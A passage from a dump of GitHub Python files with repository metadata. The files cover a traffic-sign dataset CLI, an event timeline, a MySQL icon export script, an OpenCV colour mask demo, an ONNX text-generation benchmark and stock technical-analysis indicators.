(mandatory)\",\n 34: \"go left (mandatory)\",\n 35: \"go straight (mandatory)\",\n 36: \"go right or straight (mandatory)\",\n 37: \"go left or straight (mandatory)\",\n 38: \"keep right (mandatory)\",\n 39: \"keep left (mandatory)\",\n 40: \"roundabout (mandatory)\",\n 41: \"restriction ends (overtaking) (other)\",\n 42: \"restriction ends (overtaking (trucks)) (other)\",\n 43: \"restriction ends 60 (other)\",\n 44: \"restriction ends 70 (other)\",\n 45: \"speed limit 90 (prohibitory)\",\n 46: \"restriction ends 90 (other)\",\n 47: \"speed limit 110 (prohibitory)\",\n 48: \"restriction ends 110 (other)\",\n 49: \"restriction ends 120 (other)\",\n 50: \"speed limit 130 (prohibitory)\",\n 51: \"restriction ends 130 (other)\",\n 52: \"bend double right (danger)\",\n 53: \"highway turn (left) (other)\",\n 54: \"maximum width (prohibitory)\",\n 55: \"maximum height (prohibitory)\",\n 56: \"minimum truck distance (prohibitory)\",\n 57: \"highway exit 200 (other)\",\n 58: \"highway exit 100 (other)\",\n 59: \"right lane merging (other)\",\n 60: \"warning beacon roadwork (other)\",\n 61: \"speed limit 60 (digital) (prohibitory)\",\n 62: \"restriction ends 60 (digital) (other)\",\n 63: \"speed limit 70 (digital) (prohibitory)\",\n 64: \"restriction ends 70 (digital) (other)\",\n 65: \"speed limit 80 (digital) (prohibitory)\",\n 66: \"restriction ends 80 (digital) (other)\",\n 67: \"restriction ends 80 (digital) (other)\",\n 68: \"restriction ends 90 (digital) (other)\",\n 69: \"speed limit 100 (digital) (prohibitory)\",\n 70: \"restriction ends 100 (digital) (other)\",\n 71: \"speed limit 110 (digital) (prohibitory)\",\n 72: \"restriction ends 110 (digital) (other)\",\n 73: \"left lane merging (other)\",\n 74: \"speed limit 120 (digital) (prohibitory)\",\n 75: \"restriction ends 120 (digital) (other)\",\n 76: \"speed limit 130 (digital) (prohibitory)\",\n 77: \"restriction ends 130 (digital) (other)\",\n 78: \"no overtaking (digital) (prohibitory)\",\n 79: \"restriction ends 130 (digital) (other)\",\n 80: \"no overtaking (trucks) (digital) (prohibitory)\",\n 81: \"restriction ends (overtaking (trucks)) (other)\",\n 82: \"construction (digital) (danger)\",\n 83: \"traffic jam (digital) (danger)\",\n 84: \"highway exit (other)\",\n 85: \"traffic jam (other)\",\n 86: \"restriction distance (other)\",\n 87: \"restriction time (other)\",\n 88: \"highway exit 300m (other)\",\n 89: \"restriction ends 100 (other)\",\n 90: \"andreaskreuz (other)\",\n 91: \"one way street (left) (other)\",\n 92: \"one way street (right) (other)\",\n 93: \"beginning of highway (other)\",\n 94: \"end of highway (other)\",\n 95: \"busstop (other)\",\n 96: \"tunnel (other)\",\n 97: \"no cars (prohibitory)\",\n 98: \"train crossing (danger)\",\n 99: \"no bicycles (prohibitory)\",\n 100: \"no motorbikes (prohibitory)\",\n 101: \"no mopeds (prohibitory)\",\n 102: \"no horses (prohibitory)\",\n 103: \"no cars & motorbikes (prohibitory)\",\n 104: \"busses only (mandatory)\",\n 105: \"pedestrian zone (mandatory)\",\n 106: \"bicycle boulevard (mandatory)\",\n 107: \"end of bicycle boulevard (mandatory)\",\n 108: \"bicycle path (mandatory)\",\n 109: \"pedestrian path (mandatory)\",\n 110: \"pedestrian and bicycle path (mandatory)\",\n 111: \"separated path for bicycles and pedestrians (right) (mandatory)\",\n 112: \"separated path for bicycles and pedestrians (left) (mandatory)\",\n 113: \"play street (other)\",\n 114: \"end of play street (other)\",\n 115: \"beginning of motorway (other)\",\n 116: \"end of motorway (other)\",\n 117: 
\"crosswalk (zebra) (other)\",\n 118: \"dead-end street (other)\",\n 119: \"one way street (straight) (other)\",\n 120: \"priority road (other)\",\n 121: \"no stopping (prohibitory)\",\n 122: \"no stopping (beginning) (prohibitory)\",\n 123: \"no stopping (middle) (prohibitory)\",\n 124: \"no stopping (end) (prohibitory)\",\n 125: \"no parking (beginning) (prohibitory)\",\n 126: \"no parking (end) (prohibitory)\",\n 127: \"no parking (middle) (prohibitory)\",\n 128: \"no parking (prohibitory)\",\n 129: \"no parking zone (prohibitory)\",\n 130: \"end of no parking zone (prohibitory)\",\n 131: \"city limit (in) (other)\",\n 132: \"city limit (out) (other)\",\n 133: \"direction to village (other)\",\n 134: \"rural road exit (other)\",\n 135: \"speed limit 20 zone (prohibitory)\",\n 136: \"end speed limit 20 zone (prohibitory)\",\n 137: \"speed limit 30 zone (prohibitory)\",\n 138: \"end speed limit 30 zone (prohibitory)\",\n 139: \"speed limit 5 (prohibitory)\",\n 140: \"speed limit 10 (prohibitory)\",\n 141: \"restriction ends 10 (other)\",\n 142: \"restriction ends 20 (other)\",\n 143: \"restriction ends 30 (other)\",\n 144: \"speed limit 40 (prohibitory)\",\n 145: \"restriction ends 40 (other)\",\n 146: \"restriction ends 50 (other)\",\n 147: \"go left (now) (mandatory)\",\n 148: \"go right (now) (mandatory)\",\n 149: \"train crossing in 300m (other)\",\n 150: \"train crossing in 200m (other)\",\n 151: \"train crossing in 100m (other)\",\n 152: \"danger (digital) (danger)\",\n 153: \"restriction ends 100 (other)\",\n 154: \"highway turn (right) (other)\"}\n\n self.PATH = path\n self.label_names = []\n self.label_paths = []\n\n for p, dirs, filenames in os.walk(self.PATH):\n self.label_names += [f for f in filenames if f[-3:] == 'xml']\n self.label_paths += [os.path.join(p, f) for f in filenames if f[-3:] == 'xml']\n\n self.class_score = self._calculateClassScore()\n\n def deleteEmptyImages(self, path=None):\n if not path:\n path = self.PATH\n\n for p, dirs, filenames in os.walk(path):\n for file in [f for f in filenames if f[-3:] == 'png']:\n if file[:-3] + 'xml' not in self.label_names:\n os.remove(os.path.join(p, file))\n print(\"%i deleted due to missing label!\" % (os.path.join(p, file)))\n\n def _calculateClassScore(self, ):\n class_score = {}\n\n for label in self.label_paths:\n\n for ob in ET.parse(label).getroot().iter('object'):\n\n try:\n clazz = int(ob.find('name').text)\n xmin, ymin, xmax, ymax = [int(v.text) for v in ob.find('bndbox')]\n except:\n print(\"Fehlerhafte Klassenangabe in \" + label)\n continue\n\n if clazz in class_score:\n class_score[clazz][0] += 1\n class_score[clazz][1] += xmin\n class_score[clazz][2] += ymin\n class_score[clazz][3] += xmax\n class_score[clazz][4] += ymax\n else:\n class_score[clazz] = [1, xmin, ymin, xmax, ymax]\n\n for c in class_score:\n s = class_score[c][0]\n class_score[c][1] = round(class_score[c][1] / s, 2)\n class_score[c][2] = round(class_score[c][2] / s, 2)\n class_score[c][3] = round(class_score[c][3] / s, 2)\n class_score[c][4] = round(class_score[c][4] / s, 2)\n return class_score\n\n def _getClassName(self, i):\n if i in self.labelmap:\n return self.labelmap[i]\n else:\n return \"Unknown\"\n\n def createCSVOverview(self, zipf=None):\n\n with open(os.path.join(self.PATH, \"Summary.csv\"), 'w', newline='') as out:\n writer = csv.writer(out, delimiter=',', quoting=csv.QUOTE_NONE)\n writer.writerow(['Class ID', 'Class Name', 'Frequency', 'Avg Xmin', 'Avg Ymin', 'Avg Xmax', 'Avg Ymax'])\n for c in self.class_score:\n if c in 
self.classes:\n writer.writerow([c, self._getClassName(c), *self.class_score[c]])\n\n if zipf:\n zipf.write(os.path.join(self.PATH, 'Summary.csv'), 'Summary.csv', zipfile.ZIP_DEFLATED)\n os.remove(os.path.join(self.PATH, 'Summary.csv'))\n print(\"CSV Overview successfully created.\")\n\n def createPieChart(self, zipf=None):\n fig, ax = plt.subplots(figsize=(72, 36), subplot_kw=dict(aspect=\"equal\"))\n\n data = [self.class_score[x][0] for x in self.class_score if x in self.classes]\n label = [self._getClassName(x) for x in self.class_score if x in self.classes]\n\n def func(pct, allvals):\n absolute = int(pct / 100. * np.sum(allvals))\n return \"{:.1f}% ({:d})\".format(pct, absolute)\n\n wedges, texts, autotexts = ax.pie(data, autopct=lambda pct: func(pct, data),\n textprops=dict(color=\"w\"))\n\n legend = ax.legend(wedges, label,\n title=\"Klassen\",\n loc=\"center left\",\n bbox_to_anchor=(1, 0, 0.5, 1),\n prop={'size': 44});\n\n plt.setp(autotexts, size=34, weight=\"bold\")\n plt.setp(legend.get_title(), fontsize=64)\n ax.text(0.3, 0.1, \"Total number of objects: %d\" % (np.sum(data)), fontsize=44, transform=plt.gcf().transFigure)\n ax.set_title(\"Klassenverteilung\", fontsize=64)\n fig.savefig(os.path.join(self.PATH, 'Class Distribution.png'))\n\n if zipf:\n zipf.write(os.path.join(self.PATH, 'Class Distribution.png'), 'Class Distribution.png',\n zipfile.ZIP_DEFLATED)\n os.remove(os.path.join(self.PATH, 'Class Distribution.png'))\n print(\"Pie chart successfully created.\")\n\n def createDataSetZIP(self, name = None, sep = None, split = None):\n if not name:\n name = 'DataSet.zip'\n\n if split:\n t = int(len(self.label_paths) / 100 * split)\n train = range(t)\n random.shuffle(list(train))\n else:\n train = range(len(self.label_paths))\n\n\n with zipfile.ZipFile(os.path.join(self.PATH, name), 'w') as zip_file:\n\n for i in range(len(self.label_paths)):\n if split:\n if i in train:\n folder = 'Train/'\n else:\n folder = 'Test/'\n else:\n folder = ''\n\n label = self.label_paths[i]\n xml = label.split(os.path.sep)[-1]\n img = xml[:-3] + \"png\"\n\n for ob in ET.parse(label).getroot().iter('object'):\n c = int(ob.find('name').text)\n if c in self.classes:\n img_added = []\n zip_file.write(label, os.path.join(folder + 'Labels', xml), zipfile.ZIP_DEFLATED)\n\n for p, dirs, files in os.walk(self.PATH):\n if img in files:\n if img not in img_added:\n zip_file.write(os.path.join(p, img), os.path.join(folder + \"Images\", img),\n zipfile.ZIP_DEFLATED)\n img_added.append(img)\n else:\n break\n break\n\n if not sep:\n self.createPieChart(zip_file)\n self.createCSVOverview(zip_file)\n self.createCSVLabelMap(zip_file)\n\n def createCSVLabelMap(self, zipf=None):\n xml_list = []\n\n for label in self.label_paths:\n tree = ET.parse(label)\n root = tree.getroot()\n\n for member in root.findall('object'):\n clazz = int(member.find('name').text)\n\n if clazz in self.classes:\n value = (root.find('filename').text,\n int(root.find('size')[0].text),\n int(root.find('size')[1].text),\n self._getClassName(int(member[0].text)),\n int(member[4][0].text),\n int(member[4][1].text),\n int(member[4][2].text),\n int(member[4][3].text)\n )\n xml_list.append(value)\n column_name = ['filename', 'width', 'height', 'class', 'xmin', 'ymin', 'xmax', 'ymax']\n xml_df = pd.DataFrame(xml_list, columns=column_name)\n xml_df.to_csv(os.path.join(self.PATH, 'train.csv'), index=None)\n\n if zipf:\n zipf.write(os.path.join(self.PATH, 'train.csv'), 'labels.csv', zipfile.ZIP_DEFLATED)\n os.remove(os.path.join(self.PATH, 
'train.csv'))\n print(\"Label CSV successfully created.\")\n\n\nclass FullPaths(argparse.Action):\n \"\"\"Expand user- and relative-paths\"\"\"\n def __call__(self, parser, namespace, values, option_string=None):\n setattr(namespace, self.dest, os.path.abspath(os.path.expanduser(values)))\n\n\ndef is_dir(dirname):\n \"\"\"Checks if a path is an actual directory\"\"\"\n if not os.path.isdir(dirname):\n msg = \"{0} is not a directory\".format(dirname)\n raise argparse.ArgumentTypeError(msg)\n else:\n return dirname\n\n\ndef main(argv):\n parser = argparse.ArgumentParser(description='Generate Data Sets for Object detection!')\n parser.add_argument('-p', help=\"Pfad zum Ordner des Datasets.\", action=FullPaths, type=is_dir, metavar='PATH')\n\n parser.add_argument('-c', help=\"Bestimmte Klassen setzen.\", metavar='classes', type=int, nargs='*')\n parser.add_argument('--zip', help='Komplettes Datenset als zip erstellen.', dest='zip', action='store_true')\n parser.add_argument('--stat_csv', help='Klassen Statistik als csv erstellen.', dest='csv', action='store_true')\n parser.add_argument('--stat_img', help='Klassen Statistik als png erstellen.', dest='img', action='store_true')\n parser.add_argument('--del_img', help='Bilder ohne Label löschen.', dest='delete', action='store_true')\n parser.add_argument('--train_csv', help='Train.csv für Object Detection erstellen.', dest='train', action='store_true')\n parser.add_argument('--sep_class', help='ZIP für jeden Klasse einzelnd erstellen.', dest='sep', action='store_true')\n parser.add_argument('--split', help=\"Train/Test Split - % für Train\", dest='split', type=int)\n\n args = parser.parse_args(argv)\n\n if args.c:\n generator = Generator(args.p, args.c)\n else:\n generator = Generator(args.p)\n\n if args.delete:\n generator.deleteEmptyImages()\n\n if args.zip:\n if not args.sep:\n if args.split:\n generator.createDataSetZIP(split=args.split)\n else:\n generator.createDataSetZIP()\n else:\n if args.c:\n classes = args.c\n else:\n classes = range(1, 155)\n for c in classes:\n gen = Generator(args.p, [c])\n name = 'Class_' + str(c) + '.zip'\n if args.split:\n gen.createDataSetZIP(name=name, sep=True, split=args.split)\n print(name + \"- wurde erzeugt!\")\n else:\n gen.createDataSetZIP(name=name, sep=True)\n print(name + \"- wurde erzeugt!\")\n\n if args.csv:\n generator.createCSVOverview()\n\n if args.img:\n generator.createPieChart()\n\n if args.train:\n generator.createCSVLabelMap()\n\n\nif __name__ == '__main__':\n main(sys.argv[1:])", "repo_name": "Project-Road-Sign-Detection/Tensorflow-Street-Sign-Recognition", "sub_path": "Data Set Pipeline/DataSetCLI.py", "file_name": "DataSetCLI.py", "file_ext": "py", "file_size_in_byte": 20036, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 47, "dataset": "github-code", "pt": "53", "api": [{"api_name": "os.walk", "line_number": 172, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 174, "usage_type": "call"}, {"api_name": "os.path", "line_number": 174, "usage_type": "attribute"}, {"api_name": "os.walk", "line_number": 182, "usage_type": "call"}, {"api_name": "os.remove", "line_number": 185, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 185, "usage_type": "call"}, {"api_name": "os.path", "line_number": 185, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 186, "usage_type": "call"}, {"api_name": "os.path", "line_number": 186, "usage_type": "attribute"}, {"api_name": "xml.etree.ElementTree.parse", "line_number": 193, 
"usage_type": "call"}, {"api_name": "xml.etree.ElementTree", "line_number": 193, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 227, "usage_type": "call"}, {"api_name": "os.path", "line_number": 227, "usage_type": "attribute"}, {"api_name": "csv.writer", "line_number": 228, "usage_type": "call"}, {"api_name": "csv.QUOTE_NONE", "line_number": 228, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 235, "usage_type": "call"}, {"api_name": "os.path", "line_number": 235, "usage_type": "attribute"}, {"api_name": "zipfile.ZIP_DEFLATED", "line_number": 235, "usage_type": "attribute"}, {"api_name": "os.remove", "line_number": 236, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 236, "usage_type": "call"}, {"api_name": "os.path", "line_number": 236, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 240, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 240, "usage_type": "name"}, {"api_name": "numpy.sum", "line_number": 246, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.setp", "line_number": 258, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 258, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.setp", "line_number": 259, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 259, "usage_type": "name"}, {"api_name": "numpy.sum", "line_number": 260, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.gcf", "line_number": 260, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 260, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 262, "usage_type": "call"}, {"api_name": "os.path", "line_number": 262, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 265, "usage_type": "call"}, {"api_name": "os.path", "line_number": 265, "usage_type": "attribute"}, {"api_name": "zipfile.ZIP_DEFLATED", "line_number": 266, "usage_type": "attribute"}, {"api_name": "os.remove", "line_number": 267, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 267, "usage_type": "call"}, {"api_name": "os.path", "line_number": 267, "usage_type": "attribute"}, {"api_name": "random.shuffle", "line_number": 277, "usage_type": "call"}, {"api_name": "zipfile.ZipFile", "line_number": 282, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 282, "usage_type": "call"}, {"api_name": "os.path", "line_number": 282, "usage_type": "attribute"}, {"api_name": "xml.etree.ElementTree", "line_number": 294, "usage_type": "name"}, {"api_name": "os.path", "line_number": 294, "usage_type": "attribute"}, {"api_name": "xml.etree.ElementTree", "line_number": 295, "usage_type": "name"}, {"api_name": "xml.etree.ElementTree.parse", "line_number": 297, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree", "line_number": 297, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 301, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree", "line_number": 301, "usage_type": "argument"}, {"api_name": "os.path", "line_number": 301, "usage_type": "attribute"}, {"api_name": "zipfile.ZIP_DEFLATED", "line_number": 301, "usage_type": "attribute"}, {"api_name": "os.walk", "line_number": 303, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 306, "usage_type": "call"}, {"api_name": "os.path", "line_number": 306, "usage_type": "attribute"}, {"api_name": "zipfile.ZIP_DEFLATED", "line_number": 307, "usage_type": "attribute"}, {"api_name": "xml.etree.ElementTree.parse", 
"line_number": 322, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree", "line_number": 322, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 340, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 341, "usage_type": "call"}, {"api_name": "os.path", "line_number": 341, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 344, "usage_type": "call"}, {"api_name": "os.path", "line_number": 344, "usage_type": "attribute"}, {"api_name": "zipfile.ZIP_DEFLATED", "line_number": 344, "usage_type": "attribute"}, {"api_name": "os.remove", "line_number": 345, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 345, "usage_type": "call"}, {"api_name": "os.path", "line_number": 345, "usage_type": "attribute"}, {"api_name": "argparse.Action", "line_number": 349, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 352, "usage_type": "call"}, {"api_name": "os.path", "line_number": 352, "usage_type": "attribute"}, {"api_name": "os.path.expanduser", "line_number": 352, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 357, "usage_type": "call"}, {"api_name": "os.path", "line_number": 357, "usage_type": "attribute"}, {"api_name": "argparse.ArgumentTypeError", "line_number": 359, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 365, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 419, "usage_type": "attribute"}]} +{"seq_id": "26972475259", "text": "from sortedcontainers import SortedSet\nfrom request import Request\nfrom response import Response\n\n\nclass Timeline:\n def __init__(self, requests_file_name):\n self.timeline = SortedSet(key=lambda x: x.finish_time if type(x) is Response else x.created_time)\n with open(requests_file_name) as requests_input_file:\n for line in requests_input_file:\n tokens = line.split()\n time, app_name = int(tokens[0]), tokens[1]\n self.add(Request(app_name, time))\n\n def get_next(self):\n return self.timeline.pop(0) if len(self.timeline) else None\n\n def add(self, obj):\n self.timeline.add(obj)\n\n def iterate(self):\n while True:\n next_elem = self.get_next()\n if next_elem:\n yield next_elem\n else:\n break\n", "repo_name": "maxxaon/kursovaya", "sub_path": "scaler_Marin/timeline.py", "file_name": "timeline.py", "file_ext": "py", "file_size_in_byte": 850, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "sortedcontainers.SortedSet", "line_number": 8, "usage_type": "call"}, {"api_name": "response.Response", "line_number": 8, "usage_type": "name"}, {"api_name": "request.Request", "line_number": 13, "usage_type": "call"}]} +{"seq_id": "19189003342", "text": "from dc import *\nfrom sqlalchemy.pool import QueuePool\nimport mysql.connector\nimport os\n\nmysql_connection_env = {\n \"host\": getenv(\"MYSQL_HOST\", \"127.0.0.1\"),\n \"port\": getenv(\"MYSQL_PORT\", 3306),\n \"user\": getenv(\"MYSQL_USER\", \"isucon\"),\n \"password\": getenv(\"MYSQL_PASS\", \"isucon\"),\n \"database\": getenv(\"MYSQL_DBNAME\", \"isucondition\"),\n \"time_zone\": \"+09:00\",\n}\ndef select_all(cnxpool, query, *args, dictionary=True):\n cnx = cnxpool.connect()\n try:\n cur = cnx.cursor(dictionary=dictionary)\n cur.execute(query, *args)\n return cur.fetchall()\n finally:\n cnx.close()\n\n\n# コネクションプール サイズ10\ncnxpool = QueuePool(lambda: mysql.connector.connect(**mysql_connection_env), pool_size=10)\n\nquery = \"\"\"\n SELECT * FROM `isu` ORDER BY `id` 
DESC\n\"\"\"\nisu_list = [Isu(**row) for row in select_all(cnxpool, query, ())]\n\nfor isu in isu_list:\n image = isu.image\n filepath = APP_ROUTE + f\"api/isu/{isu.jia_isu_uuid}/icon\"\n os.makedirs(os.path.dirname(filepath), exist_ok=True)\n with open(filepath, \"wb\") as f:\n f.write(image)\n", "repo_name": "lapras-inc/ISUCON-11-manin", "sub_path": "python/_export_icon.py", "file_name": "_export_icon.py", "file_ext": "py", "file_size_in_byte": 1100, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "sqlalchemy.pool.QueuePool", "line_number": 25, "usage_type": "call"}, {"api_name": "mysql.connector.connector.connect", "line_number": 25, "usage_type": "call"}, {"api_name": "mysql.connector.connector", "line_number": 25, "usage_type": "attribute"}, {"api_name": "mysql.connector", "line_number": 25, "usage_type": "name"}, {"api_name": "os.makedirs", "line_number": 35, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 35, "usage_type": "call"}, {"api_name": "os.path", "line_number": 35, "usage_type": "attribute"}]} +{"seq_id": "74285446247", "text": "import cv2 \nimport numpy as np \n\nminRed1 = np.array([90, 100, 100]) \nmaxRed1 = np.array([135, 255, 255]) \n\nminRed2 = np.array([0, 100, 250])\nmaxRed2 = np.array([0, 255, 255])\n\ncap = cv2.VideoCapture(0)\n\nwhile True:\n ret, frame = cap.read() \n hsv = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV) \n\n red_only1 = cv2.bitwise_and(frame, frame, mask=cv2.inRange(hsv, minRed1, maxRed1)) \n red_only2 = cv2.bitwise_and(frame, frame, mask=cv2.inRange(hsv, minRed2, maxRed2)) \n\n result = cv2.addWeighted(red_only1, 1, red_only2, 1, 1)\n cv2.imshow('window', frame) \n cv2.imshow('window2', result) \n\n if cv2.waitKey(1) & 0xFF == ord('q'): \n break \n\ncap.release() \ncv2.destroyAllWindows()\n\n", "repo_name": "Null-Delta/ADMP", "sub_path": "LR2/task2.py", "file_name": "task2.py", "file_ext": "py", "file_size_in_byte": 701, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "numpy.array", "line_number": 4, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 5, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 7, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 8, "usage_type": "call"}, {"api_name": "cv2.VideoCapture", "line_number": 10, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 14, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2HSV", "line_number": 14, "usage_type": "attribute"}, {"api_name": "cv2.bitwise_and", "line_number": 16, "usage_type": "call"}, {"api_name": "cv2.inRange", "line_number": 16, "usage_type": "call"}, {"api_name": "cv2.bitwise_and", "line_number": 17, "usage_type": "call"}, {"api_name": "cv2.inRange", "line_number": 17, "usage_type": "call"}, {"api_name": "cv2.addWeighted", "line_number": 19, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 20, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 21, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 23, "usage_type": "call"}, {"api_name": "cv2.destroyAllWindows", "line_number": 27, "usage_type": "call"}]} +{"seq_id": "21583851226", "text": "import torch\nfrom transformers import AutoTokenizer, AutoModelForTokenClassification, pipeline, AutoModelForCausalLM\nfrom transformers import pipeline\nfrom deepspeed.module_inject import HFBertLayerPolicy\nimport deepspeed\nimport tqdm\nfrom 
datasets import load_dataset\nimport warnings\n\nwarnings.filterwarnings(\"ignore\")\ndataset = load_dataset(\"ChaiML/user_model_inputs\")\n# Model Repository on huggingface.co\nmodel_id = \"KoboldAI/OPT-6B-nerys-v2\"\n# model_id = \"gpt2\"\n\nstats = {}\n\n# load model and tokenizer\ntry:\n tokenizer = AutoTokenizer.from_pretrained(model_id, use_fast=True)\nexcept:\n tokenizer = AutoTokenizer.from_pretrained(model_id, use_fast=False)\n\n# Test pipeline\nGENERATION_KWARGS = {\n \"max_new_tokens\": 32,\n # \"min_new_tokens\": 8,\n 'eos_token_id': 198,\n 'do_sample': True,\n 'pad_token_id': 198,\n 'temperature': 0.72,\n 'top_k': 0,\n 'top_p': 0.725,\n 'repetition_penalty': 1.13,\n}\n\nINPUT_EXAMPLES = dataset[\"train\"][\"text\"][:100]\n\nexample = INPUT_EXAMPLES[0]\n\nimport os\nfrom optimum.onnxruntime import ORTModelForCausalLM\nfrom transformers import AutoTokenizer, pipeline\n\nmodel_checkpoint = \"KoboldAI/OPT-6B-nerys-v2\"\nsave_directory = \"onnx/\"\nfile_name = \"model.onnx\"\nonnx_path = os.path.join(save_directory, \"model.onnx\")\n\n# Load a model from transformers and export it through the ONNX format\n# model = ORTModelForCausalLM.from_pretrained(model_checkpoint, from_transformers=True).to(0)\n\nmax_batch_size = 1\nfor i in range(1, 5):\n try:\n inputs = tokenizer([example] * i, return_tensors='pt').to(0)\n # result = model.generate(**inputs, **GENERATION_KWARGS)\n print(f\"Batch size: {i}\")\n max_batch_size = i\n except Exception as ex:\n print(ex)\n break\n\n# torch_pipe = pipeline(\"text-generation\", model=model, tokenizer=tokenizer, device=0)\nprint(\"ONNX single batch\")\ntorch_outputs = []\nfor example in tqdm.tqdm(INPUT_EXAMPLES[:20], desc=\"ONNX single batch\"):\n inputs = tokenizer(example, return_tensors='pt').to(0)\n # result = model.generate(**inputs, **GENERATION_KWARGS)\n # torch_output = torch_pipe(example, **GENERATION_KWARGS)[0][\"generated_text\"][len(example):]\n # torch_outputs.append(torch_output)\nprint(\"ONNX batch size\")\ntorch_outputs = []\ntry:\n for example in tqdm.tqdm(INPUT_EXAMPLES[:10], desc=\"ONNX batch size\"):\n inputs = tokenizer([example] * max_batch_size, return_tensors='pt').to(0)\n # result = model.generate(**inputs, **GENERATION_KWARGS)\nexcept Exception as ex:\n print(ex)\n", "repo_name": "AlekseyKorshuk/xla-clm", "sub_path": "onnx/bert.py", "file_name": "bert.py", "file_ext": "py", "file_size_in_byte": 2510, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "warnings.filterwarnings", "line_number": 10, "usage_type": "call"}, {"api_name": "datasets.load_dataset", "line_number": 11, "usage_type": "call"}, {"api_name": "transformers.AutoTokenizer.from_pretrained", "line_number": 20, "usage_type": "call"}, {"api_name": "transformers.AutoTokenizer", "line_number": 20, "usage_type": "name"}, {"api_name": "transformers.AutoTokenizer.from_pretrained", "line_number": 22, "usage_type": "call"}, {"api_name": "transformers.AutoTokenizer", "line_number": 22, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 48, "usage_type": "call"}, {"api_name": "os.path", "line_number": 48, "usage_type": "attribute"}, {"api_name": "tqdm.tqdm", "line_number": 67, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 75, "usage_type": "call"}]} +{"seq_id": "24315675344", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# https://www.quantopian.com/posts/technical-analysis-indicators-without-talib-code\n# 
https://github.com/FreddieWitherden/ta/blob/master/ta.py\n\nimport pandas as pd\nimport numpy as np\n\n#Moving Average\ndef MA(df, n):\n MA = pd.Series(pd.rolling_mean(df['close'], n), name = 'MA_' + str(n))\n return MA\n\n#Exponential Moving Average\ndef EMA(df, n):\n EMA = pd.Series(df['close'].ewm(span = n, min_periods = int(n - 1)).mean(), name = 'EMA_' + str(n))\n return EMA\n\n#Momentum\ndef MOM(df, n):\n M = pd.Series(df['close'].diff(n), name = 'Momentum_' + str(n))\n return M\n\n#Rate of Change\ndef ROC(df, n):\n M = df['close'].diff(n - 1)\n N = df['close'].shift(n - 1)\n ROC = pd.Series(M / N, name = 'ROC_' + str(n))\n return ROC\n\n#Average True Range\ndef ATR(df, n):\n i = 0\n TR_l = [0]\n while i < df.index[-1]:\n TR = max(df.ix[i + 1, 'high'], df.ix[i, 'close']) - min(df.ix[i + 1, 'low'], df.ix[i, 'close'])\n TR_l.append(TR)\n i = i + 1\n TR_s = pd.Series(TR_l)\n ATR = pd.Series(TR_s.ewm(span = n, min_periods = int(n)).mean(), name = 'ATR_' + str(n))\n return ATR\n\n#Bollinger Bands\ndef BBANDS(df, n):\n MA = pd.Series(pd.rolling_mean(df['close'], n))\n MSD = pd.Series(pd.rolling_std(df['close'], n))\n b1 = 4 * MSD / MA\n B1 = pd.Series(b1, name = 'BollingerB_' + str(n))\n b2 = (df['close'] - MA + 2 * MSD) / (4 * MSD)\n B2 = pd.Series(b2, name = 'Bollinger%b_' + str(n))\n return B1, B2\n\n#Pivot Points, Supports and Resistances\ndef PPSR(df):\n PP = pd.Series((df['high'] + df['low'] + df['close']) / 3)\n R1 = pd.Series(2 * PP - df['low'])\n S1 = pd.Series(2 * PP - df['high'])\n R2 = pd.Series(PP + df['high'] - df['low'])\n S2 = pd.Series(PP - df['high'] + df['low'])\n R3 = pd.Series(df['high'] + 2 * (PP - df['low']))\n S3 = pd.Series(df['low'] - 2 * (df['high'] - PP))\n psr = {'PP':PP, 'R1':R1, 'S1':S1, 'R2':R2, 'S2':S2, 'R3':R3, 'S3':S3}\n PSR = pd.DataFrame(psr)\n return PSR\n\n#Stochastic oscillator %K\ndef STOK(df):\n SOk = 